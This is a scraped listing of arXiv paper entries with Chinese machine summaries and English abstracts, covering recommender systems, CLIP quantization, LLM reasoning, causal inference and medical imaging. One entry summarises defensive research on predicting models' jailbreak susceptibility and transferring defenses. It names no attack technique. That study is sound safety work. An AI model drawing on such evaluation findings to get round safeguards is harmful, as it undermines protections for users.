随着互联网服务的快速发展,推荐系统已变得不可或缺。特别是混合(重排序)阶段在跨不同业务目标分配流量中起着关键作用。然而,现有方法常受限于耦合的分配方案、分数膨胀和缺乏可解释性。为应对这些挑战,我们提出Uniboost,一个统一的流量分配框架。Uniboost引入后验价值对齐机制,将抽象模型分数校准到具有明确业务语义的锚定指标,显著增强可解释性。此外,它采用独立的线性提升范式来解耦复杂的加权方案,实现每个计划贡献的精确归因。我们通过在线A/B测试和深入数据分析验证了Uniboost的有效性,展示了三个关键发现:1)降低加权分数的整体权重有效减轻了意外的业务干扰,产生更高效的微观流量分配策略;2)事后分析和聚合仪表板提供了直观的宏观洞察,指导整体流量分配机制的设计;3)提出的“有效完成分数”作为易于获取的后验指标,为内容推荐管道提供了可靠的锚点。综合来看,我们的实验表明,Uniboost不仅在微观层面提升了流量分配效率和推荐性能,还为系统迭代提供了宏观指导。因此,这项工作为大规模工业推荐系统提供了一种高效可控的流量调节解决方案。

英文摘要

With the rapid evolution of internet services, recommendation systems have become indispensable. In particular, the blending (re-ranking) stage plays a pivotal role in allocating traffic across diverse business objectives. However, existing approaches often suffer from coupled allocation plans, score inflation, and a lack of interpretability. To address these challenges, we propose Uniboost, a unified traffic allocation framework. Uniboost introduces a posterior value alignment mechanism that calibrates abstract model scores to anchor metrics with explicit business semantics, significantly enhancing interpretability. Furthermore, it employs an independent linear boosting paradigm to decouple complex weighting schemes, enabling precise attribution of each plan's contribution. We validate the effectiveness of Uniboost through online A/B tests and in-depth data analysis, demonstrating three key findings: 1) Reducing the overall weight of weighted scores effectively mitigates unintended business interference, yielding a more efficient micro-level traffic allocation strategy; 2) Post-hoc analyses and aggregated dashboards provide intuitive, macro-level insights that guide the design of the overall traffic allocation mechanism; 3) The proposed "Effective Completion Score" serves as an easily obtainable post-metric that offers a reliable anchor for content recommendation pipelines. Collectively, our experiments show that Uniboost not only improves traffic allocation efficiency and recommendation performance at the micro level but also provides macro-level guidance for system iteration. Thus, this work provides an efficient and controllable traffic regulation solution for large-scale industrial recommendation systems.

2605.26415 2026-05-27 cs.CV cs.AI 版本更新

The Rescue Effect: Spatio-Semantic Early Exit Bypasses Quantization Collapse in CLIP

拯救效应:空间语义早期退出绕过CLIP中的量化崩溃

Kahyeon Nam, Hyesong Choi

发表机构 * Soongsil University(崇实大学)

AI总结 针对CLIP模型INT8量化导致的表示崩溃问题,提出LRA-EE方法,通过空间语义聚合、多特征门控和层自适应阈值实现早期退出,在ImageNet-1K零样本分类中降低13.4% FLOPs并提升2.44个百分点的准确率。

详情
AI中文摘要

在资源受限的硬件上部署视觉-语言模型通常需要INT8量化,但在CLIP等联合嵌入架构中,这引入了一种不同于量化CNN分类器的故障模式:跨Transformer块累积的激活噪声扰乱了多模态嵌入的方向,侵蚀了零样本检索所依赖的余弦对齐。我们将此特征化为量化诱导的表示崩溃(QIRC),并在INT8 CLIP ViT-B/32上对其进行定量刻画,其中逐层噪声信号比从浅层块的低于10%增长到第11层的52%。我们提出LRA-EE(逐层表示感知早期退出),它通过空间语义聚合(用全局补丁令牌平均替代不成熟的浅层[CLS])、学习到的多特征门控(置信度、top-2间隔、空间激活方差)以及根据每层信息噪声比校准的层自适应置信阈值,绕过噪声饱和的深层。在ImageNet-1K零样本分类上,LRA-EE相比INT8基线减少了13.4%的FLOPs,并将Top-1准确率提高了2.44个百分点(58.72% -> 61.16%)。四象限分解隔离了拯救效应:9.5%的样本在浅层出口被正确分类,但在全深度被噪声丢失,而只有7.1%遭受相反情况。

英文摘要

Deploying Vision-Language Models on resource-constrained hardware typically requires INT8 quantization, but in joint-embedding architectures such as CLIP this introduces a failure mode distinct from quantized CNN classifiers: activation noise accumulated across transformer blocks perturbs the direction of the multimodal embedding, eroding the cosine alignment on which zero-shot retrieval depends. We characterize this as Quantization-Induced Representation Collapse (QIRC) and quantify it on INT8 CLIP ViT-B/32, where the layer-wise noise-to-signal ratio grows from below 10% in shallow blocks to 52% at Layer 11. We propose LRA-EE (Layer-wise Representation-Aware Early Exit), which bypasses noise-saturated deep layers via Spatio-Semantic Aggregation (replacing the immature shallow [CLS] with a global patch-token average), a learned multi-feature gate (confidence, top-2 margin, spatial-activation variance), and Layer-adaptive Confidence Thresholding calibrated to each layer's Information-to-Noise Ratio. On ImageNet-1K zero-shot classification, LRA-EE reduces FLOPs by 13.4% and improves Top-1 accuracy by +2.44%p (58.72% -> 61.16%) over the INT8 baseline. A four-quadrant decomposition isolates the Rescue Effect: 9.5% of samples are correctly classified at shallow exits but lost to noise at full depth, against only 7.1% suffering the inverse.
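The ingredients named in the abstract can be illustrated with a minimal sketch: averaging patch tokens into one embedding, deriving confidence and top-2 margin from zero-shot logits, and checking a per-layer threshold. Several things here are assumptions rather than the paper's design: the gate in the abstract is learned, whereas this sketch substitutes a fixed threshold on confidence alone; the spatial-activation variance feature is omitted; and all function names and the `thresholds` mapping are hypothetical.

```python
import math


def softmax(logits):
    """Numerically stable softmax over a list of logits."""
    m = max(logits)
    exps = [math.exp(x - m) for x in logits]
    total = sum(exps)
    return [e / total for e in exps]


def mean_pool(patch_tokens):
    """Average patch-token vectors into a single image embedding."""
    dim = len(patch_tokens[0])
    count = len(patch_tokens)
    return [sum(tok[d] for tok in patch_tokens) / count for d in range(dim)]


def gate_features(logits):
    """Return (confidence, top-2 margin) computed from zero-shot logits."""
    probs = sorted(softmax(logits), reverse=True)
    return probs[0], probs[0] - probs[1]


def should_exit(logits, layer, thresholds):
    """Stand-in rule (assumption): exit when confidence clears the layer's threshold."""
    confidence, _ = gate_features(logits)
    return confidence >= thresholds[layer]
```

A layer-adaptive scheme would populate `thresholds` with a different value per layer; how those values are calibrated to each layer's information-to-noise ratio is specific to the paper and not reproduced here.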

2605.26414 2026-05-27 cs.AI cs.CL cs.LG 版本更新

Reasoning, Code, or Both? How Large Language Models Handle Variations in Math Questions

推理、代码,还是两者兼有?大型语言模型如何处理数学问题的变化

Matthew Kutakh

AI总结 本研究通过对比链式思维推理、单次代码执行和迭代代码执行三种方法在GSM-Symbolic数据集上的表现,发现代码执行并未提升大型语言模型在数学问题变体上的推理鲁棒性。

Comments 6 pages, 4 figures, 2 tables

详情
AI中文摘要

大型语言模型(LLMs)在数学推理基准测试中取得了令人印象深刻的准确性,但当问题被修改为不同的名字或数字等简单变化时,它们的性能会下降。代码执行方法允许模型生成并运行Python代码,而不是用自然语言进行推理,已被提出作为解决方案,但其对推理鲁棒性(即在问题变体中保持准确性的能力)的影响尚未得到系统测试。本研究在GSM-Symbolic数据集的1000个问题上评估了三种方法:使用链式思维(CoT)提示的纯推理、使用程序辅助语言模型(PAL)的单次代码执行,以及使用逐步编码(SBSC)的迭代代码执行。所有三种方法均在配对的原始问题和修改问题上使用Claude Haiku 4.5运行。CoT是最鲁棒的方法,在扰动下准确率下降1.3个百分点,1.8%的问题被破坏。PAL的鲁棒性最差,准确率下降1.7个百分点,3.1%的问题被破坏,SBSC介于两者之间。尽管这些差异在统计上不显著($p = .096$),但方向趋势在所有指标上一致,表明无论是单次还是迭代的代码执行,都没有提高小学水平问题变体的推理鲁棒性。

英文摘要

Large Language Models (LLMs) achieve impressive accuracy on mathematical reasoning benchmarks, yet their performance drops when problems are modified with simple changes like different names or numbers. Code execution methods, which let models generate and run Python code instead of reasoning in natural language, have been proposed as a solution, but their effect on reasoning robustness (the ability to maintain accuracy across problem variations) has not been systematically tested. This study evaluates three approaches on 1,000 problems from the GSM-Symbolic dataset: pure reasoning using chain-of-thought (CoT) prompting, single-shot code execution using Program-Aided Language models (PAL), and iterative code execution using Step-by-Step Coding (SBSC). All three were run on paired original and modified problems using Claude Haiku 4.5. CoT was the most robust method, with an accuracy drop of 1.3 percentage points and 1.8% of problems breaking under perturbation. PAL was the least robust, with an accuracy drop of 1.7 percentage points and 3.1% of problems breaking, and SBSC fell in between. Although these differences were not statistically significant ($p = .096$), the directional trend was consistent across all measures, suggesting that code execution, whether single-shot or iterative, does not improve reasoning robustness on grade-school-level problem variations.
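The two robustness figures quoted above can be computed from paired correctness labels, as in the following sketch. The abstract does not spell out its exact definitions, so this assumes that a problem "breaks" when it is answered correctly in its original form but incorrectly in its modified form, and that the break rate is taken over all problems; the function name is hypothetical.

```python
def robustness_metrics(original_correct, modified_correct):
    """Accuracy drop (percentage points) and break rate (%) over paired problems."""
    n = len(original_correct)
    acc_original = sum(original_correct) / n
    acc_modified = sum(modified_correct) / n
    # Assumed definition: correct on the original, wrong on the modified variant.
    broken = sum(
        1 for o, m in zip(original_correct, modified_correct) if o and not m
    )
    return {
        "accuracy_drop_pp": 100.0 * (acc_original - acc_modified),
        "break_rate_pct": 100.0 * broken / n,
    }


# Toy paired results for ten problems (hypothetical data).
original = [True] * 8 + [False] * 2
modified = [True] * 6 + [False] * 2 + [True, False]
metrics = robustness_metrics(original, modified)
```

The two numbers can diverge, as they do in this toy case: problems that flip from wrong to right offset the accuracy drop but do not reduce the break rate, which is one reason to report both.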

2605.26413 2026-05-27 stat.ME cs.AI cs.LG stat.ML 版本更新

Confounder Detection via Treatment Intent: A New Observational Study Design

通过治疗意图进行混杂检测:一种新的观察性研究设计

Drago Plecko, Patrik Okanovic, Torsten Hoefler, Elias Bareinboim

发表机构 * UCLA(加州大学洛杉矶分校) ETH Zurich(苏黎世联邦理工学院) Columbia University(哥伦比亚大学)

AI总结 提出一种通过询问治疗决策者比较配对单元来揭示未观测混杂因素的新研究设计,并在ICU数据中验证其有效性。

详情
AI中文摘要

理解干预的效果是科学进步的核心,随机对照试验(RCT)在许多应用领域被视为因果推断的金标准。然而,RCT成本高、耗时长,且常受伦理或实际限制,这促使我们需要能够从观察性数据中得出结论的因果方法。尽管此类数据收集规模日益扩大,但将其用于因果推断常因并非所有影响治疗分配和结果的变量都被观测到而受阻,这一问题称为未观测混杂。在本文中,我们介绍了一种称为通过治疗意图进行混杂检测的新研究设计。其思路是询问做出治疗决策的人类专家,并要求他们比较由原则性匹配策略提出的单元对,目的是引出解释治疗决策为何不同的未观测变量。我们为此类程序提供了理论基础,确定了此类研究设计可能引出未观测混杂因素的条件。基于这些新建立的基础,我们研究了重症监护病房(ICU)中干预的治疗效果。首先,我们展示了强烈表明ICU中收集的电子健康记录(EHR)存在未观测混杂的经验证据。通过使用临床文本笔记作为医生知识的代理并利用自然语言处理,我们在已知真实情况的半合成环境中为我们的方法提供了概念验证。

英文摘要

Understanding the effects of interventions is central to scientific progress, with randomized controlled trials (RCTs) regarded as the gold standard for causal inference in many applied fields. However, RCTs are costly, time-consuming, and often constrained by ethical or practical limitations, motivating the need for causal methods able to draw conclusions from observational data. While such data is collected at ever larger scale, its use for causal inference is often hindered by the fact that not all variables affecting treatment allocation and the outcome are observed: an issue known as unobserved confounding. In this paper, we introduce a new study design called confounder detection via treatment intent. The idea is to query a human expert who makes treatment decisions, and ask them to compare pairs of units proposed by a principled matching strategy, with the goal of eliciting unobserved variables that explain why treatment decisions differ. We provide a theoretical basis for such a procedure, ascertaining conditions under which such a study design may elicit unobserved confounders. Building on these newly established foundations, we study treatment effects of interventions in the intensive care unit (ICU). First, we show empirical evidence strongly indicating that electronic health records (EHRs) collected in ICUs are subject to unobserved confounding. By using clinical text notes as a proxy for physicians' knowledge and leveraging natural language processing, we provide a proof of concept for our methodology in a semi-synthetic environment with a known ground truth.

2605.26409 2026-05-27 cs.CR cs.AI cs.LG 版本更新

Jailbreak susceptibility prediction and mitigation via the behavioral geometry of models

通过模型的行为几何进行越狱易感性预测与缓解

Hayden Helm, Xiaodong Liu, Weiwei Yang

发表机构 * Microsoft Research(微软研究院)

AI总结 本文通过形式化模型群体的行为几何,利用已评估和防御的模型,实现高效的易感性预测和防御迁移,在79个模型和100个系统配置上,易感性检测AUPRC达0.94且探针减少约98%,防御迁移性能优于同供应商分配。

详情
AI中文摘要

评估和缓解生成系统对越狱攻击的易感性对其安全部署至关重要。由于可部署系统的数量众多,对每种配置进行全面评估和优化是不切实际的。本文形式化了模型群体的行为几何,通过利用先前评估和防御过的模型,支持群体内高效的易感性预测和有效的防御迁移。我们将该框架应用于涵盖24个提供商的79个模型以及单个基础模型的100个系统配置。使用行为几何的简单方法在易感性检测中达到了0.94的AUPRC,与全面评估相比,探针数量减少了约98%。使用行为几何选择从哪个模型迁移优化后的防御,在无额外探针成本的情况下优于同供应商分配(+2%,p = 0.03),且一组三个模型足以覆盖整个群体。结果对超参数选择和评判者具有鲁棒性。

英文摘要

Evaluating and mitigating a generative system's susceptibility to jailbreak attacks is critical to its safe deployment. Given the number of deployable systems, full per-configuration evaluation and optimization is impractical. In this paper, we formalize the behavioral geometry of a population of models that, by leveraging previously evaluated and defended models, supports both efficient susceptibility prediction and effective defense transfer across a population. We apply the framework to 79 models spanning 24 providers and to 100 system configurations of a single base model. Simple methods that use the behavioral geometry reach an AUPRC of $0.94$ for susceptibility detection with $\approx98\%$ fewer probes relative to a full evaluation. Using the behavioral geometry to select which model to transfer an optimized defense from outperforms same-provider assignment ($+2\%$, $p = 0.03$) at no additional probe cost, with a set of three models sufficient to cover the population. Results are robust to hyperparameter selection and judge.

2605.26403 2026-05-27 cs.AI 版本更新

From Static Context to Calibrated Interactive RL: Mitigating Distribution Shift in Multi-turn Dialogue with Aligned Simulator

从静态上下文到校准的交互式强化学习:利用对齐模拟器缓解多轮对话中的分布偏移

Xiaohua Wang, Jiakang Yuan, Zisu Huang, Muzhao Tian, Changze Lv, Kaitao Song, Tao Chen, Xiaoqing Zheng

发表机构 * Fudan University(复旦大学)

AI总结 本文提出校准的交互式强化学习框架,通过将交互式强化学习与模拟器对齐相结合,缓解多轮对话中因策略和模拟器导致的分布偏移,提升对话质量。

详情
AI中文摘要

研究界的一个长期目标是开发高度交互的基于LLM的对话代理。最近的研究侧重于基于固定离线日志(静态上下文强化学习)或基于提示的模拟器(交互式强化学习)来优化策略。在这项工作中,我们从理论上证明,这两种范式都受到上下文分布偏移的根本限制——即训练期间观察到的对话历史与真实对话中遇到的对话历史之间的不匹配。这种偏移在每轮对话中呈二次方累积,严重降低对话质量。具体来说,我们将这种偏移归因于两个不同的来源:(i)策略引起的偏移,源于在静态历史而非自生成轨迹上进行训练;(ii)模拟器引起的偏移,源于模拟行为与真实人类行为之间的差异。为了解决这些挑战,我们提出了校准的交互式强化学习,这是一个统一的框架,将交互式强化学习与模拟器对齐相结合。通过将模拟器与人类交互模式对齐,我们的方法减少了模拟到真实的差距,并减轻了累积的分布偏移。在多个对话任务上的实验证实了我们的理论分析:(i)交互式强化学习通过缓解策略分布偏移,显著优于静态上下文基线;(ii)使用我们的对齐方法校准模拟器进一步弥合了模拟到真实的差距,产生了最先进的下游性能。

英文摘要

A long-standing goal of the research community is to develop highly interactive LLM-based dialogue agents. Recent research focuses on optimizing policies based on fixed offline logs (Static Context RL) or using a prompt-based simulator (Interactive RL). In this work, we theoretically show that both paradigms are fundamentally limited by context distribution shift: a mismatch between dialogue histories observed during training and those encountered in real conversations. This shift compounds quadratically over turns and severely degrades dialogue quality. Specifically, we attribute this shift to two distinct sources: (i) policy-induced shift, arising from training on static histories rather than self-generated trajectories; and (ii) simulator-induced shift, stemming from discrepancies between simulated and real human behaviors. To address these challenges, we propose Calibrated Interactive RL, a unified framework that couples interactive RL with simulator alignment. By aligning the simulator with human interaction patterns, our approach reduces the sim-to-real gap and mitigates compounding distribution shifts. Experiments across multiple dialogue tasks confirm our theoretical analysis: (i) Interactive RL significantly outperforms the Static Context baseline by mitigating policy distribution shift; and (ii) calibrating simulators with our alignment method further bridges the sim-to-real gap, yielding state-of-the-art downstream performance.

2605.26400 2026-05-27 cs.IR cs.AI 版本更新

Plans for Evaluating Structured Generative Search Summaries

评估结构化生成式搜索摘要的计划

Tetsuya Sakai, Jina Lee, Hanpei Fang, Young-In Song

发表机构 * Waseda University/Naver Corporation(早稻田大学/NAVER公司) Waseda University(早稻田大学) Naver Corporation(NAVER公司)

AI总结 提出一个评估大型语言模型生成的结构化搜索摘要的框架,该摘要包含概述、带标题的章节和引用源文档列表,并描述了实施和评估该框架的计划。

Comments 8 pages (including 2 pages for references)

详情
AI中文摘要

我们提出了一个评估结构化生成式搜索摘要的框架,这些摘要放置在自然网页搜索结果之上。由大型语言模型生成的结构化摘要通常包括一个概述、几个带有章节标题的章节,以及摘要中引用的源文档列表。然后,我们描述了实施和评估该框架的计划。

英文摘要

We propose a framework for evaluating structured generative search summaries that are placed atop organic web search results. A structured summary, generated by a large language model, typically consists of an overview, several sections with section titles, and a list of source documents that are cited within the summary. We then describe our plans for implementing and evaluating the framework.

2605.26385 2026-05-27 cs.IR cs.AI stat.ML 版本更新

Credit-assigned Policy Gradient for Early Stage Retrieval in Two-stage Ranking

两阶段排序中早期检索的信用分配策略梯度

Haruka Kiyohara, Mihaela Curmei, Ariel Evnine, Shankar Kalyanaraman, Israel Nir, Ana-Roxana Pop, Nitzan Razin, Sarah Dean, Thorsten Joachims, Udi Weinsberg

发表机构 * Computer Science Department, Cornell University, Ithaca, NY, USA(康奈尔大学计算机科学系) Central Applied Science, Meta, Menlo Park, CA, USA(Meta中央应用科学)

AI总结 针对两阶段排序中早期排序器(ESR)端到端训练难的问题,提出信用分配策略梯度(CA-PG),通过对目标项被选中的概率求梯度来降低方差,提升训练稳定性和收敛速度。

Comments ICML2026

详情
AI中文摘要

大规模搜索、推荐和检索增强生成(RAG)系统通常采用两阶段架构:早期排序器(ESR)生成候选集,随后由后期排序器(LSR)重新排序。虽然有许多强化学习(RL)方法用于训练LSR,但ESR的端到端训练被证明具有挑战性。特别是,朴素应用“普通”策略梯度(V-PG)对于实际使用的候选集大小不可扩展,因为方差爆炸。该问题源于V-PG将梯度传播到候选集的联合概率,忽略了候选集中每个特定项对奖励的贡献。为缓解此问题,我们提出了一种新颖的“信用分配”策略梯度(CA-PG),它计算相对于目标项在任何候选集中被选中的概率的梯度,即边际化所有包含它的候选集。我们的理论分析表明,CA-PG通过边际化候选集的具体组成显著降低了V-PG的方差,同时保留了在合理对齐的LSR策略下学习正确排序项的能力。在合成和真实数据上的实验表明,CA-PG提高了使用经典Plackett-Luce模型的ESR的收敛速度和训练稳定性,特别是在候选集大小较大时。

英文摘要

Large-scale search, recommendation, and retrieval-augmented generation (RAG) systems typically employ a two-stage architecture: an early-stage ranker (ESR) generates a candidate set, which is subsequently re-ranked by a late-stage ranker (LSR). While there are many reinforcement learning (RL) methods for training the LSR, end-to-end training of the ESR has proven challenging. In particular, naive application of "vanilla" policy gradient (V-PG) is not scalable for candidate-set sizes relevant for practical use due to exploding variance. This issue arises because V-PG propagates the gradient to the joint probability of the candidate sets, ignoring the contribution of each specific item in the candidate set to the reward. To mitigate this issue, we propose a novel "credit-assigned" policy gradient (CA-PG), which computes gradients with respect to the probability that the target item is chosen in any candidate set, i.e. marginalizing over all candidate sets that contain it. Our theoretical analysis reveals that CA-PG significantly reduces the variance of V-PG by marginalizing over the specific composition of the candidate set, while preserving the ability to learn the correct ranking of items under a reasonably aligned LSR policy. Experiments on both synthetic and real-world data demonstrate that CA-PG improves the convergence speed and training stability for ESRs utilizing the canonical Plackett-Luce model, especially when the candidate-set size is large.
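To make the distinction between the two quantities in the abstract concrete, the sketch below computes, for a tiny Plackett-Luce model, (a) the joint probability of one specific ordered candidate list and (b) the marginal probability that a target item appears in any size-k candidate list. The marginal is obtained by brute-force enumeration, which is only feasible for toy sizes and is not the estimator used in the paper; the function names and the example scores are illustrative assumptions.

```python
import itertools
import math


def pl_ordered_prob(scores, ordered_items):
    """Plackett-Luce probability of drawing `ordered_items` in exactly this order."""
    weights = [math.exp(s) for s in scores]
    remaining = sum(weights)
    prob = 1.0
    for item in ordered_items:
        # Each pick is proportional to its weight among items not yet drawn.
        prob *= weights[item] / remaining
        remaining -= weights[item]
    return prob


def inclusion_prob(scores, target, k):
    """Marginal probability that `target` is in a size-k candidate list (brute force)."""
    n = len(scores)
    return sum(
        pl_ordered_prob(scores, perm)
        for perm in itertools.permutations(range(n), k)
        if target in perm
    )


scores = [1.0, 0.0, -1.0]  # hypothetical early-stage ranker scores
joint = pl_ordered_prob(scores, (0, 1))
marginals = [inclusion_prob(scores, item, k=2) for item in range(3)]
```

Because every size-k list contains exactly k items, the marginals sum to k, which gives a quick sanity check on the enumeration. The joint probability depends on the full composition and order of the list, while the marginal depends only on whether the target made it in, which is the property the abstract credits for the variance reduction.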

2605.26380 2026-05-27 cs.CV cs.AI 版本更新

VisualNeedle: Benchmarking Active Visual Search in Information-Dense Scenes

VisualNeedle: 信息密集场景中的主动视觉搜索基准

Jingru Chen, Yiming Liu, Mingtao Chen, Sijie Chen, Richeng Xuan, Liang Yang, Zhichao Hu, Fanyang Lu

发表机构 * Hunyuan, Tencent(腾讯 Hunyuan) Peking University(北京大学) Zhejiang University(浙江大学)

AI总结 针对多模态大语言模型在细粒度感知基准中依赖捷径而非真实视觉证据的问题,提出VisualNeedle基准,通过反事实裁剪-黑化设置评估模型在信息密集场景中的主动视觉搜索能力,实验表明最佳模型准确率仅56.01%,落后人类63.00%。

详情
AI中文摘要

前沿多模态大语言模型(MLLMs)被报道在细粒度感知基准上达到超过90%的准确率。然而,这样的分数并不一定意味着对视觉证据的忠实使用。先前的研究已经识别出三种抬高基准性能的捷径。首先,问题中的语言先验和词汇线索使模型能够在未见图像的情况下推断出看似合理的答案。其次,来自视觉编码器的粗略全局语义可以绕过细粒度的局部细节。第三,在一些“用图像思考”的基准中,破坏视觉工具返回的中间图像几乎不影响最终答案。这些发现表明,仅靠更高的输入分辨率或更大的问题池并不能引发真正的主动视觉搜索。为了解决这个问题,我们引入了VisualNeedle,这是一个具有挑战性、信息密集且细粒度的基准,用于关键证据在空间上局限于微小区域且无法一眼看出的场景。我们进一步提出了一种反事实裁剪-黑化设置,将工具返回的裁剪区域替换为相同大小的黑色图像,以测试工具启用的性能是否真正依赖于中间视觉证据。我们在三种设置下评估了9个著名的MLLMs:无工具、标准工具启用和裁剪-黑化。无工具准确率保持在20%以下,最佳工具启用模型仅达到56.01%,仍落后于63.00%的人类多数投票准确率。这些结果揭示了细粒度视觉搜索中持续存在的局限性,而裁剪-黑化消融实验证实,VisualNeedle上的成功依赖于真正的中间视觉证据。

英文摘要

Frontier multimodal large language models (MLLMs) have been reported to achieve over 90% accuracy on fine-grained perception benchmarks. However, such scores do not necessarily imply faithful use of visual evidence. Prior studies have identified three shortcuts that inflate benchmark performance. First, linguistic priors and lexical cues in questions often enable models to infer plausible answers without seeing the image. Second, coarse global semantics from the visual encoder can bypass fine-grained local details. Third, in some "think-with-images" benchmarks, corrupting the intermediate images returned by visual tools barely affects the final answer. These findings suggest that higher input resolution or larger question pools alone do not elicit genuine active visual search. To address this, we introduce VisualNeedle, a challenging, information-dense, and fine-grained benchmark for scenes where critical evidence is spatially constrained to minute regions and not discernible at a glance. We further propose a counterfactual crop-black setting, which replaces crops returned by tools with black images of the same size, to test whether tool-enabled performance truly relies on intermediate visual evidence. We evaluate 9 prominent MLLMs across three settings: no-tool, standard tool-enabled, and crop-black. No-tool accuracy stays below 20%, and the best tool-enabled model reaches only 56.01%, still trailing the 63.00% human majority-vote accuracy. These results reveal persistent limitations in fine-grained visual search, while the crop-black ablation confirms that success on VisualNeedle hinges on genuine intermediate visual evidence.
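The crop-black intervention described above amounts to swapping a tool's returned crop for an all-black image of identical size. A minimal sketch follows, assuming images are represented as nested lists of height x width x channels with integer pixel values; the representation and both function names are hypothetical and not taken from the benchmark's code.

```python
def crop_region(image, top, left, height, width):
    """Return the sub-image starting at (top, left) with the given size."""
    return [row[left:left + width] for row in image[top:top + height]]


def black_like(crop):
    """Return an all-black image with the same height, width, and channels as `crop`."""
    return [[[0 for _ in pixel] for pixel in row] for row in crop]


# A toy 2 x 3 RGB image (hypothetical pixel values).
image = [
    [[10, 20, 30], [40, 50, 60], [70, 80, 90]],
    [[11, 21, 31], [41, 51, 61], [71, 81, 91]],
]
crop = crop_region(image, top=0, left=1, height=2, width=2)
counterfactual = black_like(crop)
```

Under this setup, a model whose answers do not change when `counterfactual` is returned in place of `crop` is evidently not relying on the intermediate visual evidence, which is the dependence the crop-black setting is designed to test.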

2605.26376 2026-05-27 cs.CV cs.AI cs.LG 版本更新

BioFact-MoE: Biologically Factorized Mixture of Experts for Vision-Language Prognostic Modeling in Hepatocellular Carcinoma

BioFact-MoE:基于生物学因子分解的混合专家模型用于肝细胞癌的视觉-语言预后建模

Junlin Yang, Tian Yu, Nicha C. Dvornek, Yuexi Du, Peiyu Duan, Annabella Shewarega, Lawrence H. Staib, James S. Duncan, Julius Chapiro

发表机构 * Department of Radiology & Biomedical Imaging, Department of Biomedical Engineering, Department of Electrical Engineering, Department of Statistics & Data Science, Yale University, New Haven, CT, 06510, USA

AI总结 提出BioFact-MoE框架,通过生物学监督的混合专家模型显式分解肝脏和肿瘤因子,在肝细胞癌预后预测中提升准确性和生物学可解释性。

Comments Early accepted at MICCAI 2026

详情
AI中文摘要

肝细胞癌(HCC)具有生物学异质性,由肝功能储备和肿瘤相关肿瘤学因素之间的相互作用塑造;因此,相似的生存结果可能反映根本不同的潜在生物学过程。HCC的预后建模依赖于来自多参数MRI和常规临床实践放射学报告的丰富多模态信息。现有的预后视觉-语言模型(VLM)学习单一的纠缠潜在表示,混合了肝脏和肿瘤相关因素,限制了准确性和生物学可解释性。我们提出BioFact-MoE,一个生物学因子分解的混合专家(MoE)框架,通过残差MoE生存架构中的生物学监督专家显式分解肝脏和肿瘤因素。在N=588名患者的HCC队列(在4,582个3D MRI图像-报告对上预训练)中,BioFact-MoE在所有时间范围内持续优于所有基线的生存预测,实现了12、18和24个月的AUC分别为75.33%、75.85%和73.96%。除了标量风险预测,门控专家权重实现了表型感知的风险分层。通路感知的门控揭示了临床上有意义的治疗相关生存异质性。在保留验证中,肝脏和肿瘤嵌入分别与肝功能标志物和肿瘤负荷标志物显示出选择性关联(p<0.05),无需监督。代码可在https://github.com/jy-639/BioFact-MoE获取。

英文摘要

Hepatocellular carcinoma (HCC) is biologically heterogeneous, shaped by the interplay between hepatic functional reserve and tumor-related oncologic factors; thus, similar survival outcomes may reflect fundamentally different underlying biological processes. Prognostic modeling in HCC is informed by rich multimodal information from multiparametric MRI and radiology reports from routine clinical practice. Existing prognostic vision-language models (VLMs) learn a single entangled latent representation that blends hepatic and tumor-related factors, limiting both accuracy and biological interpretability. We present BioFact-MoE, a biologically factorized Mixture of Experts (MoE) framework that explicitly decomposes liver and tumor factors via biologically supervised experts within a residual MoE survival architecture. On an HCC cohort of N=588 patients (pretrained on 4,582 3D MRI image-report pairs), BioFact-MoE consistently improves survival prediction over all baselines across time horizons, achieving 12-, 18-, and 24-month AUCs of 75.33%, 75.85%, and 73.96%. Beyond scalar risk prediction, gated expert weights enable phenotype-aware risk stratification. Pathway-informed gating uncovers clinically meaningful treatment-associated survival heterogeneity. In held-out validation, hepatic and tumor embeddings show selective associations with liver function and tumor burden markers, respectively (p<0.05), without supervision. The code is available at https://github.com/jy-639/BioFact-MoE.

2605.26362 2026-05-27 cs.CL cs.AI 版本更新

Why LLMs Hallucinate on Structured Knowledge: A Mechanistic Analysis of Reasoning over Linearized Representations

为什么LLMs会在结构化知识上产生幻觉:对线性化表示推理的机制分析

Shanghao Li, Jinda Han, Yibo Wang, Yuanjie Zhu, Zihe Song, Langzhou He, Kenan Kamel A Alghythee, Philip S. Yu

发表机构 * University of Illinois Chicago(伊利诺伊大学芝加哥分校) University of Illinois Urbana-Champaign(伊利诺伊大学厄巴纳-香槟分校)

AI总结 本文通过机制分析发现,大型语言模型在结构化知识推理中产生幻觉是由于注意力过度集中于捷径式结构线索和前馈层未能将知识语义接地,导致模型依赖参数记忆。

Comments To appear in Proceedings of ACL 2026

详情
AI中文摘要

在许多推理任务中,大型语言模型(LLMs)依赖于结构化外部知识,如图和表格,这些知识通常被线性化为连续的令牌表示。然而,即使有足够的知识可用,LLMs仍然可能产生幻觉输出,这种失败背后的潜在机制仍然知之甚少。我们研究了这些机制,发现幻觉源于系统性的内部动态而非随机噪声。首先,注意力不成比例地集中在类似捷径的结构线索上,而不是分布在完整的上下文中。其次,前馈表示未能将提供的知识接地,导致模型回归到参数记忆。此外,我们的结果表明,幻觉始终与前馈层中的语义接地失败相关,而注意力分配表现出更大的任务依赖性。最后,我们展示了这些机制模式从单跳图推广到多跳和表格设置,从而能够在结构化知识格式中有效检测幻觉。

英文摘要

In many reasoning tasks, large language models (LLMs) rely on structured external knowledge, such as graphs and tables, which is typically linearized into sequential token representations. However, even when sufficient knowledge is available, LLMs can still produce hallucinated outputs, and the underlying mechanisms behind such failures remain poorly understood. We investigate these mechanisms and find that hallucinations arise from systematic internal dynamics rather than random noise. First, attention concentrates disproportionately on shortcut-like structural cues rather than distributing across the full context. Second, feed-forward representations fail to ground the provided knowledge, causing the model to revert to parametric memory. Moreover, our results indicate that hallucination is consistently associated with failures in semantic grounding within feed-forward layers, while attention allocation exhibits greater task-dependent variability. Finally, we show that these mechanistic patterns generalize beyond single-hop graphs to multi-hop and tabular settings, enabling effective hallucination detection across structured knowledge formats.

2605.26353 2026-05-27 cs.CV cs.AI cs.LG 版本更新

Personalized Generative Models for Contextual Debiasing

用于上下文去偏的个性化生成模型

Xinran Liang, Esin Tureci, Prachi Sinha, Ye Zhu, Vikram V. Ramaswamy, Olga Russakovsky

发表机构 * Department of Computer Science, Princeton University(普林斯顿大学计算机科学系) LIX, CNRS, École Polytechnique(巴黎综合理工学院LIX实验室,法国国家科学研究中心)

AI总结 提出DecoupleGen方法,利用个性化文本到图像扩散模型生成罕见上下文图像,作为训练增强以缓解视觉识别中的上下文偏差。

Comments CVPR 2026 Workshop on Synthetic Data for Computer Vision and Generative Models for Computer Vision. Code available at https://github.com/princetonvisualai/DecoupleGen

详情
